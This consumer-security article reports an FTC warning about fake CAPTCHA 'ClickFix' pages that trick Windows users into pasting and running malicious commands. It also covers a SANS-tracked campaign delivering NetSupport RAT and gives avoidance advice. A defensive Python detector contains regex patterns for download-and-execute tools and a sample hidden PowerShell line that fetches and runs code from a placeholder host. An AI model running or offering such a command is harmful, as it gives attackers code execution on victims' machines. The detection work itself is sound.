The Federal Trade Commission is warning consumers that fake CAPTCHA prompts are tricking people into installing malware on their own computers. Instead of verifying a human user, the bogus “prove you’re human” boxes instruct visitors to press specific key combinations that paste and execute hidden malicious code. The stolen data includes email logins and mobile banking credentials, turning a routine web interaction into a direct path to identity theft.
How fake CAPTCHAs hijack keyboard shortcuts to install malware
The FTC says it is receiving reports of scam pages that mimic familiar CAPTCHA verification boxes but add a dangerous twist. After clicking a checkbox or completing a visual puzzle, users see instructions telling them to press Windows+R, then Ctrl+V, then Enter. That three-step sequence opens the Windows Run dialog, pastes a pre-loaded malicious command from the clipboard, and executes it, all without the user realizing what just happened. The FTC alert published in June 2026 spells out this exact workflow and confirms that the resulting malware steals credentials including email logins and mobile banking access.
No legitimate CAPTCHA system asks users to open system-level dialogs or paste text into a command prompt. Real verification steps involve clicking images, dragging sliders, or simply checking a box. The distinction matters because the fake version relies entirely on user compliance rather than any software exploit. If someone refuses to follow the keyboard instructions, the attack fails. That makes awareness the primary defense.
SmartApeSG and the ClickFix technique behind the scam
Security researchers at the SANS Internet Storm Center have independently documented the same attack pattern in a campaign they track as SmartApeSG. Their technical write-up confirmed that the campaign uses a ClickFix-style fake CAPTCHA page requiring victims to press Win+R and paste a command. The final payload delivered through this chain is NetSupport RAT, a remote access tool that gives attackers persistent control over the infected machine.
The ClickFix method is significant because it sidesteps traditional defenses. Antivirus software and browser security filters are designed to catch malicious downloads and exploit code. When the user manually types or pastes a command, those protections often do not trigger. The attack essentially recruits the victim as an unwitting accomplice, using their own trusted access to the operating system. This is what separates ClickFix-style social engineering from conventional malware distribution: it does not need a software vulnerability because it exploits a behavioral one.
The FTC frames the threat within a broader pattern of spyware and malware schemes that gain device access through seemingly helpful prompts. Tech-support scams have long used similar psychology, convincing users to grant remote access or run diagnostic tools that actually install surveillance software. Fake CAPTCHAs represent a newer, faster version of the same playbook, condensed into a few keystrokes on a single web page.
What the FTC has not disclosed about scale and specific threats
The FTC alert confirms the agency is receiving reports but does not publish victim counts, infection rates, or the names of specific financial institutions or email providers targeted by the malware. That omission leaves open questions about how widespread the campaign is and whether particular industries or regions are being hit hardest. The SANS analysis ties the SmartApeSG activity to NetSupport RAT, but the FTC keeps its language broader, describing credential theft and potential account takeover without attributing the attacks to a named tool or group.
This gap is typical of early-stage consumer warnings, which prioritize practical advice over detailed threat intelligence. For consumers, the exact malware family matters less than the behavior that installs it. Still, the absence of numbers makes it hard to gauge whether this is a niche tactic or a rapidly growing trend. Until law enforcement or industry groups release more granular data, the best assumption is that any unexpected CAPTCHA-like prompt demanding system-level keyboard shortcuts should be treated as hostile.
How to spot and avoid CAPTCHA scams
Spotting these scams starts with recognizing what a normal verification step looks like. Standard CAPTCHAs stay inside the browser window and never ask you to open the Windows Run box, a terminal, or any other operating-system feature. If a page tells you to press Windows+R, type commands, or paste anything outside the browser, stop immediately and close the tab.
Users should also be wary of CAPTCHAs that appear on top of unfamiliar pages reached through pop-ups, redirects, or pirated content sites. Many malicious pages are triggered by clicking fake download buttons or deceptive video play icons. When in doubt, navigate directly to the site you intended to visit by typing its address or using a bookmark rather than following random links.
Keeping devices updated and running reputable security software can help limit damage if a mistake happens, but no tool can fully protect against commands you voluntarily run. That is why the FTC emphasizes behavioral defenses: slow down when a site asks you to do something unusual, and remember that real security checks never hinge on obscure keyboard shortcuts.
Guidance for businesses and support teams
Organizations should brief employees about these scams, especially staff who regularly browse unfamiliar sites for research or sourcing. Security teams can incorporate fake CAPTCHA scenarios into phishing simulations and awareness training, highlighting that keyboard-based instructions are a red flag. Web administrators may also want to monitor outbound traffic for signs of remote access tools like NetSupport RAT, which can indicate a successful infection.
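One host-side check security teams can pair with the outbound-traffic monitoring above, as an added example that is not drawn from the FTC alert or the SANS write-up: every command run through the Windows Run box described earlier is recorded in the RunMRU registry key, and scoring those strings for interpreter launches, download-and-execute verbs and CAPTCHA lure wording surfaces a ClickFix paste after the fact. The indicator lists, severity thresholds and sample entries are constructed heuristics, not published detections.

```python
import re
from typing import Dict, List

# Win+R history lives under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (values a, b, c, ... each ending in "\1"); collect those strings with reg.exe or winreg.

# Indicator groups (heuristic): an interpreter or downloader launched from the Run box,
# a download-and-execute verb, and the "human verification" wording the fake pages append.
CHECKS = {
    "interpreter/downloader": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)\b", re.I),
    "download-or-execute verb": re.compile(
        r"(-e(nc|ncodedcommand)?\s+\S|\biex\b|invoke-expression|downloadstring|"
        r"-w(indowstyle)?\s+hidden|https?://)", re.I),
    "captcha lure text": re.compile(
        r"(not a robot|captcha|verification id|verify you are human)", re.I),
}

def score_entry(raw: str) -> Dict[str, object]:
    """Return the cleaned command, a severity and the reasons it was flagged."""
    cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip RunMRU's trailing "\1"
    reasons = [name for name, rx in CHECKS.items() if rx.search(cmd)]
    # Lure text is decisive on its own; otherwise require two independent hits,
    # so a plain "cmd" or "notepad" entry is not escalated.
    if "captcha lure text" in reasons or len(reasons) >= 2:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"command": cmd, "severity": severity, "reasons": reasons}

def triage(entries: List[str]) -> List[Dict[str, object]]:
    """Score every RunMRU string and keep the ones worth an analyst's look."""
    return [r for r in map(score_entry, entries) if r["severity"] != "none"]

# Constructed sample history: two ordinary entries and one ClickFix-style line
# with a placeholder .invalid host (not a real payload).
SAMPLE_RUNMRU = [
    "notepad\\1",
    "cmd\\1",
    'powershell -w hidden -c "iex(irm http://placeholder.invalid/x)" '
    "# I am not a robot - reCAPTCHA Verification ID: 7391\\1",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RUNMRU):
        print(hit["severity"].upper(), hit["reasons"], hit["command"][:70])
```

A "high" hit on a workstation is a prompt to pull the browser history for the same time window and look for the fake CAPTCHA page that supplied the clipboard contents.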
Help desks and IT support staff should be prepared for callers who encounter suspicious prompts. The FTC’s guidance on tech support fraud underscores the importance of clear policies: legitimate support will never ask users to run unverified commands from random websites. Reinforcing that message can prevent both fake CAPTCHA attacks and more traditional remote-access scams.
Ultimately, the fake CAPTCHA trend shows how attackers continue to refine social engineering, shifting from obvious scare tactics to seemingly routine web interactions. By learning to question any online instruction that reaches beyond the browser, users and businesses can blunt this latest malware delivery channel before it becomes embedded in everyday attack kits.